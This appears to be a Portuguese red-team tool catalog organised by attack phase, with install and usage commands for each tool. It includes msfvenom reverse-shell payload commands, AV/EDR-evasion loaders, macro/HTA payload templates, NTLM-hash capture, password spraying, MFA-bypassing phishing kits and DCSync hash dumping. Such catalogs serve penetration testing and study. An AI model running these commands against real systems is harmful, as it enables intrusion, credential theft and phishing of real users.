python3 AORT.py -d google.com

image

🔙spoofcheck

Um programa que verifica se um domínio pode ser falsificado. O programa verifica registros SPF e DMARC em busca de configurações fracas que permitem falsificação. Além disso, alertará se o domínio tiver configuração DMARC que envia e-mail ou solicitações HTTP em e-mails SPF/DKIM com falha.

Os domínios são falsificáveis se alguma das seguintes condições for atendida:

  • Ausência de um registro SPF ou DMARC
  • O registro SPF nunca especifica ~all ou -all
  • A política DMARC está definida como p=none ou é inexistente

Instalação:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**Uso:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

O AWSBucketDump é uma ferramenta para enumerar rapidamente buckets S3 da AWS em busca de arquivos interessantes. É semelhante a um bruteforcer de subdomínios, mas é feito especificamente para buckets S3 e também possui alguns recursos extras que permitem pesquisar arquivos, bem como baixar arquivos interessantes.

Instalação:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**Uso:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

Ferramenta útil para encontrar informações do GitHub com regex, com a capacidade de pesquisar usuários e/ou projetos específicos do GitHub.

Instalação:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**Uso:**```
./githarvester.py

🔙truffleHog

TruffleHog é uma ferramenta que analisa repositórios git e procura por strings de alta entropia e padrões que podem indicar a presença de segredos, como senhas e chaves de API. Com o TruffleHog, você pode encontrar rapidamente informações sensíveis que podem ter sido acidentalmente commitadas e enviadas a um repositório.

Instalação (Binários): Link

Instalação (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**Uso:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap é uma ferramenta de descoberta e identificação de ativos. Ela pode identificar rapidamente protocolos e informações de impressão digital, como web/tcp/udp, localizar tipos de ativos, e é adequada para redes internas e externas.

Dismap possui uma base completa de regras de impressão digital, atualmente incluindo impressões digitais de protocolos tcp/udp/tls e mais de 4500 regras de impressão digital web, que podem identificar favicon, body, header, etc.

Instalação:

Dismap é um arquivo binário para Linux, MacOS e Windows. Vá até o Release para baixar a versão correspondente e executar:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**Uso:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Imagem usada de https://github.com/zhzyker/dismap

🔙enum4linux

Uma ferramenta para enumerar informações de sistemas Windows e Samba.

Pode ser usada para coletar uma ampla gama de informações, incluindo:

  • Informações de domínio e controlador de domínio
  • Informações de usuários e grupos locais
  • Compartilhamentos e permissões de compartilhamento
  • Políticas de segurança
  • Informações do Active Directory

Instalação: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**Instalar: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Uso:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
Informações completas de uso podem ser encontradas neste [blog](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://assets.kitploit.com/production/public/readmes/147/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

*Imagem usada de https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

Scanner dns/rede/porta perigosamente rápido, criado por [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), escrito em rust.

Você precisará de um arquivo de subdomínios. *Ex.: [Wordlist de subdomínios por Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.

**Instalação:** 

Baixe a última versão de [aqui](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Uso:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

*Imagem usada de https://github.com/Esc4iCEscEsc/skanuvaty*

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor é uma ferramenta de Inteligência, seu objetivo é realizar tarefas de OSINT e mais, mas sem nenhuma chave de API.

**Principais Características:**

- Pesquisa informações sobre endereço IP, ASN e Organização.
- Wrapper para executar rustscan, masscan e nmap de forma mais eficiente em IP/CIDR.
- Encontra mais domínios relacionados ao alvo aplicando várias técnicas (certificado, whois, Google Analytics, etc).
- Obter resumo sobre endereço IP (fornecido por [@thebl4ckturtle](https://github.com/theblackturtle))

**Instalação:**```bash
go install github.com/j3ssie/metabigor@latest

Uso:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

*Imagem utilizada de https://github.com/j3ssie/metabigor*

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

O Gitrob é uma ferramenta para ajudar a encontrar arquivos potencialmente sensíveis enviados para repositórios públicos no Github.

O Gitrob clona repositórios pertencentes a um usuário ou organização até uma profundidade configurável e percorre o histórico de commits, sinalizando arquivos que correspondem a assinaturas de arquivos potencialmente sensíveis.

Os resultados serão apresentados através de uma interface web para fácil navegação e análise.

**Nota:** *O Gitrob precisará de um token de acesso do Github para interagir com a API do Github. [Crie um token de acesso pessoal](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) e salve-o em uma variável de ambiente no seu .bashrc ou arquivo de configuração similar do shell:*```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Instalar: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**Instalação: (Binário)** 

Uma [versão pré-compilada](https://github.com/michenriksen/gitrob/releases) está disponível para cada lançamento.

**Uso:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

Imagem usada de https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness é uma ferramenta de captura de tela de sites escrita em Golang, que utiliza o Chrome Headless para gerar capturas de tela de interfaces web através da linha de comando, com um prático visualizador de relatórios para processar os resultados. Tanto Linux quanto macOS são suportados, com suporte para Windows funcionando na maioria das vezes.

Instalação: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
A informação completa de instalação pode ser encontrada [aqui](https://github.com/sensepost/gowitness/wiki/Installation).

**Uso:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

Informações completas de uso podem ser encontradas aqui.

image

Imagem usada de https://github.com/sensepost/gowitness

Desenvolvimento de Recursos

🔙remoteInjector

Injeta link para modelo remoto do Word em documento do Word.

Este utilitário baseado em Python modifica o link settings.xml.rels de um arquivo .docx para um template .dotm hospedado remotamente contendo uma macro VBA, executando quando o documento é aberto e as macros estão habilitadas.

Postagem de Blog Relacionada

Instalar:```bash git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector

root@kitploit:~
**Uso:**```bash
python3 remoteinjector.py -w https://example.com/template.dotm example.docx

🔙Chimera

Chimera é um script de ofuscação PowerShell projetado para contornar soluções AMSI e antivírus. Ele digere PS1s maliciosos conhecidos por acionar AV e usa substituição de strings e concatenação de variáveis para evadir assinaturas de detecção comuns.

Install:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**Uso:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

O Msfvenom permite a criação de payloads para vários sistemas operacionais em uma ampla gama de formatos. Também suporta ofuscação de payloads para bypass de AV.

Configurar Listener```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### Comandos Msfvenom

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙Shellter

O Shellter é uma ferramenta dinâmica de injeção de shellcode e o primeiro infetor PE verdadeiramente dinâmico já criado.

Pode ser utilizado para injetar shellcode em aplicações nativas do Windows (atualmente apenas aplicações de 32 bits).

O Shellter tira partido da estrutura original do ficheiro PE e não aplica qualquer modificação como alterar permissões de acesso à memória nas secções (a menos que o utilizador queira), adicionar uma secção extra com acesso RWE, ou qualquer outra coisa que pareça suspeita numa análise de AV.

A informação completa do README pode ser encontrada aqui.

Instalação: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**Instalação: (Windows)** 

Visite a [página de download](https://www.shellterproject.com/download/) e instale.

**Uso:** 

Basta escolher um binário legítimo para backdoor e executar o Shellter.

Algumas dicas úteis podem ser encontradas [aqui](https://www.shellterproject.com/tipstricks/).

Muitos demos de uso da comunidade podem ser encontrados [aqui](https://www.shellterproject.com/shellter-community-demos/).

![image](https://assets.kitploit.com/production/public/readmes/147/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

*Imagem usada de https://www.kali.org/tools/shellter/images/shellter.png*

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze é uma ferramenta de criação de payload usada para contornar controles de segurança EDR e executar shellcode de forma furtiva. 

Freeze utiliza múltiplas técnicas não apenas para remover hooks de EDR no Userland, mas também para executar shellcode de forma que contorna outros controles de monitoramento de endpoint.

**Instalação:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

Uso:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

*Imagem usada de https://www.blackhatethicalhacking.com/tools/freeze/*

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

Este script criará um Documento do Microsoft Word com uma imagem remota, permitindo a captura de hashes NTML de um endpoint remoto da vítima.

O Microsoft Word tem a capacidade de incluir imagens de locais remotos, incluindo uma imagem remota hospedada em um servidor SMB controlado pelo atacante. Isso lhe dá a oportunidade de escutar e capturar hashes NTLM que são enviados quando uma vítima autenticada abre o documento do Word e renderiza a imagem.

**Instalação:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

Uso:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

*Imagem usada de https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*

### [🔙](#tool-list)[NTAPI Undocumented Functions](http://undocumented.ntinternals.net/)

Este site fornece informações sobre internals não documentados do Windows, chamadas de sistema, estruturas de dados e outros detalhes de baixo nível do sistema operacional Windows.

Pode ser um recurso valioso para indivíduos que desejam explorar os internals do Windows para diversos fins, incluindo análise de vulnerabilidades, desenvolvimento de exploits e escalonamento de privilégios.

Ao desenvolver exploits, compreender os internals do sistema alvo é crucial. Este site pode ajudar no desenvolvimento de exploits ao aproveitar os aspectos não documentados de baixo nível do Windows.

**Uso:**

Visite [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/)

![image](https://assets.kitploit.com/production/public/readmes/147/3c88e47b3afc58cee00fe06443626d0ac8354195bf3988c973cfeefdce21d197.png)

*Imagem usada de http://undocumented.ntinternals.net/*

### [🔙](#tool-list)[Kernel Callback Functions](https://codemachine.com/articles/kernel_callback_functions.html)

Esta nota técnica fornece uma lista abrangente de todas as APIs exportadas pelo Kernel do Windows, para que gravadores de drivers registrem rotinas de callback que são invocadas por componentes do kernel em várias circunstâncias.

A maioria dessas rotinas está documentada no Windows Driver Kit (WDK), mas algumas são destinadas ao uso por drivers internos.

As funções não documentadas são descritas brevemente, enquanto as documentadas são apenas listadas aqui para referência.

**Uso:**

Visite [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html)

![image](https://assets.kitploit.com/production/public/readmes/147/ccdbb9756a5efe851f7366430ee13b1e380ba5a8a3be2e71d93788f7c71f32f7.png)

*Imagem usada de https://codemachine.com*

### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA)

Uma coleção de técnicas ofensivas, scripts e links úteis para obter execução de código e evasão de defesa por meio de macros do Office.

**Uso:**

Visite [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo)

![image](https://assets.kitploit.com/production/public/readmes/147/a1e2be51d71eb16d0dc2e331e56089899a00da59681226f64a584c249bbde6fd.png)

*Imagem usada de https://github.com/S3cur3Th1sSh1t*

### [🔙](#tool-list)WSH

**Criando payload:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Executar:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**Criando payload:**```html
<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Executar: Executar arquivo

🔙VBA

Criando payload:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**Executar:** Definir função para Auto_Open() em documento habilitado para macro

Acesso Inicial
====================

### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)

Lançar um ataque de pulverização de senhas / força bruta através de proxies de passagem da Amazon AWS, alterando o endereço IP de solicitação para cada tentativa de autenticação. Isso cria dinamicamente APIs FireProx para pulverizações de senhas mais evasivas.

O CredMaster fornece um método de executar pulverizações de senhas anônimas contra endpoints em uma ferramenta simples e fácil de usar. A ferramenta FireProx fornece o IP de solicitação rotativo, enquanto a base do CredMaster falsifica todas as outras informações de identificação.

Funcionalidades:
- Suporta totalmente todas as regiões da AWS
- Gera automaticamente APIs para passagem de proxy
- Falsifica números de rastreamento de API, IPs de encaminhamento e outros cabeçalhos de rastreamento de proxy
- Processamento multi-thread
- Contadores de atraso de senha e configuração para evasão de política de bloqueio
- Adicione facilmente novos plugins
- Totalmente anônimo

**Instalação:**```bash
git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt

Para instruções completas de instalação, veja aqui.

Uso:```bash python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json

root@kitploit:~
Esta ferramenta requer chaves de acesso à API AWS, um passo a passo de como obter essas chaves pode ser encontrado aqui: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

![credmaster](https://assets.kitploit.com/production/public/readmes/147/0b3b39000bca40b701781836c94d98cc1efa1c23783a2344bfbf30fde4293d4a.png)

*Imagem usada de https://github.com/knavesec/CredMaster/wiki*

### [🔙](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)

TREVORspray é um pulverizador de senhas modular com threading, proxy SSH, módulos de loot e mais!

**Instalação:**```bash
pip install https://github.com/blacklanternsecurity/TREVORspray

Uso:```bash

Recon

python3 ./trevorspray --recon evilcorp.com

Enumerate users via OneDrive

python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10

Spray against discovered

python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token

root@kitploit:~
Para instruções de uso completas, consulte [aqui](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).

![TREVORspray](https://assets.kitploit.com/production/public/readmes/147/7663363d4be94c22481a92a86f36f1777a8f9c4d85ad76ca3df5ee09096deb09.png)

*Imagem usada de https://github.com/blacklanternsecurity/TREVORspray*

### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)

Kit de ferramentas demonstrando uma outra abordagem do ataque QRLJacking, permitindo realizar a tomada remota de contas através de phishing com QR code de login.

Consiste em uma extensão de navegador usada pelo atacante para extrair o QR code de login e uma aplicação servidora, que recupera os QR codes de login para exibi-los nas páginas de phishing hospedadas.

Demonstração em [vídeo](https://www.youtube.com/watch?v=8pfodWzqMcU)

**Instalação: (Extensão)** 

Você pode carregar a extensão no Chrome através do recurso `Carregar sem compactação`:
https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked

Depois que a extensão estiver instalada, certifique-se de fixar seu ícone na barra de ferramentas de extensões do Chrome, para que o ícone fique sempre visível.

**Instalação: (Servidor)**```bash
git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat

Uso:

  1. Execute o servidor executando o binário do servidor compilado: ./server/build/evilqr-server
  2. Abra qualquer um dos sites suportados no seu navegador Chrome, com a extensão Evil QR instalada:``` https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login
root@kitploit:~
3. Certifique-se de que o código QR de login está visível e clique no ícone da extensão **Evil QR** na barra de ferramentas. Se o código QR for reconhecido, o ícone deve acender com cores.
4. Abra a URL da página de phishing do servidor: `http://127.0.0.1:35000` (padrão)

![evilqr](https://assets.kitploit.com/production/public/readmes/147/f8ff7150038690a1c6608be4071593f736ccb4369d43ebc0af44791c020e2b15.png)

*Imagem usada de https://breakdev.org/evilqr-phishing/*

### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp)

A forma mais comum de autenticação é a combinação de um nome de usuário e uma senha ou frase secreta. As senhas às vezes podem ser descobertas ao traçar o perfil do usuário, como aniversário, apelido, endereço, nome de um animal de estimação ou parente, ou uma palavra comum como Deus, amor, dinheiro ou senha.

Foi por isso que o CUPP nasceu.

**Instalação:**```bash
git clone https://github.com/Mebus/cupp;cd cupp

Uso:```bash

Run in interactive mode

python3 ./cupp.py -i

root@kitploit:~
![cupp](https://assets.kitploit.com/production/public/readmes/147/1c9d63a8d34972498c7a267463fc4233869f68059aee885a2b88ce276cfffffb.png)

*Imagem usada de https://github.com/Mebus/cupp*

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

O Bash Bunny é uma ferramenta de ataque USB física e um sistema de entrega de payload multifuncional. Ele é projetado para ser conectado a uma porta USB de um computador e pode ser programado para realizar uma variedade de funções, incluindo manipular e exfiltrar dados, instalar malware e contornar medidas de segurança.

[hackinglab: Bash Bunny – Guia](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Documentação Hak5](https://docs.hak5.org/bash-bunny/)

[Repositório de Payloads Legais](https://github.com/hak5/bashbunny-payloads)

[Página do Produto](https://hak5.org/products/bash-bunny)

![imagem](https://assets.kitploit.com/production/public/readmes/147/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish é um poderoso framework de phishing de código aberto que facilita testar a exposição da sua organização a phishing. (evilginx2) Framework autônomo de ataque man-in-the-middle usado para phishing de credenciais de login juntamente com cookies de sessão, permitindo contornar a autenticação de dois fatores.

**Instalação:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

Uso:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

Este framework é excelente para criar campanhas de acesso inicial. 'O SET possui uma série de vetores de ataque personalizados que permitem criar um ataque convincente rapidamente'.

**Instalação:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Uso:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

Ferramenta útil para ataques de força bruta de login. Pode realizar brute force em vários serviços, incluindo SSH, FTP, TELNET, HTTP etc.

**Instalação:**```bash
sudo apt install hydra

Uso:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish é uma ferramenta avançada de phishing que utiliza uma técnica que combina o fluxo de autenticação de código de dispositivo OAuth e códigos QR (Veja [PhishInSuits](https://github.com/secureworks/PhishInSuits) para mais informações sobre o fluxo de código de dispositivo OAuth em ataques de phishing).

Etapas do ataque:

- Enviar código QR malicioso para a vítima
- Vítima escaneia o código QR com dispositivo móvel
- Vítima direcionada para servidor controlado pelo atacante (Iniciando o processo de fluxo de autenticação de código de dispositivo OAuth)
- Vítima recebe código MFA por e-mail (Iniciando o temporizador de 15 minutos do fluxo de código de dispositivo OAuth)
- Atacante consulta a autenticação
- Vítima insere o código no site legítimo da Microsoft
- Atacante salva o token de autenticação

**Instalação:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Nota: Antes de usar qualquer um dos módulos, atualize as informações necessárias no arquivo settings.config indicadas com Required.

Uso (Módulo de Email):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**Uso (Módulo do Servidor):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

O King Phisher é uma ferramenta que permite que atacantes criem e enviem e-mails de phishing para vítimas, a fim de obter informações confidenciais.

Ele inclui funcionalidades como modelos personalizáveis, gerenciamento de campanhas e capacidade de envio de e-mails, tornando-se uma ferramenta poderosa e fácil de usar para realizar ataques de phishing. Com o King Phisher, os atacantes podem mirar indivíduos ou organizações com e-mails de phishing direcionados e convincentes, aumentando as chances de sucesso em seus ataques.

Instalação (Linux - Cliente e Servidor):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**Uso:**

Após instalar o King Phisher, siga a [página wiki](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) para configurar SSH, banco de dados, servidor SMTP, etc.

![image](https://assets.kitploit.com/production/public/readmes/147/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

Execução
====================

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder é uma ferramenta para envenenar os protocolos LLMNR e NBT-NS em uma rede, permitindo a captura de credenciais e a execução arbitrária de código.

Os protocolos LLMNR (Link-Local Multicast Name Resolution) e NBT-NS (NetBIOS Name Service) são usados por sistemas Windows para resolver nomes de host para endereços IP em uma rede local. Se um nome de host não puder ser resolvido usando esses protocolos, o sistema transmitirá uma requisição para o nome de host na rede local.

O Responder escuta essas transmissões e responde com um endereço IP falso, enganando o sistema requisitante para que envie suas credenciais ao atacante.

**Instalação:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

Uso:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
Informações completas de uso podem ser encontradas [aqui](https://github.com/SpiderLabs/Responder#usage).

![image](https://assets.kitploit.com/production/public/readmes/147/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

*Imagem usada de https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

Uma utilidade que faz parte da biblioteca Impacket que pode ser usada para extrair hashes de senhas e outros segredos de um sistema Windows. 

Isso é feito interagindo com o banco de dados do Gerenciador de Contas de Segurança (SAM) no sistema e extraindo as senhas hash e outras informações, tais como:

- Hashes de senhas para contas locais
- Tíquetes e chaves Kerberos
- LSA Secrets

**Install:**```bash
python3 -m pip install impacket

Uso:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

*Imagem usada de https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM é uma ferramenta que fornece uma interface de linha de comando para o Windows Remote Management (WinRM: *Um serviço que permite que administradores executem comandos remotamente em uma máquina Windows*).

Evil-WinRM permite que um atacante se conecte remotamente a uma máquina Windows usando WinRM e execute comandos arbitrários.

Algumas funcionalidades incluem:

- Carregar scripts Powershell na memória
- Carregar arquivos dll na memória ignorando alguns AVs
- Carregar payloads x64
- Suporte a pass-the-hash
- Fazer upload e download de arquivos locais e remotos


**Instalação: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Instalação: (Ruby gem)```bash gem install evil-winrm

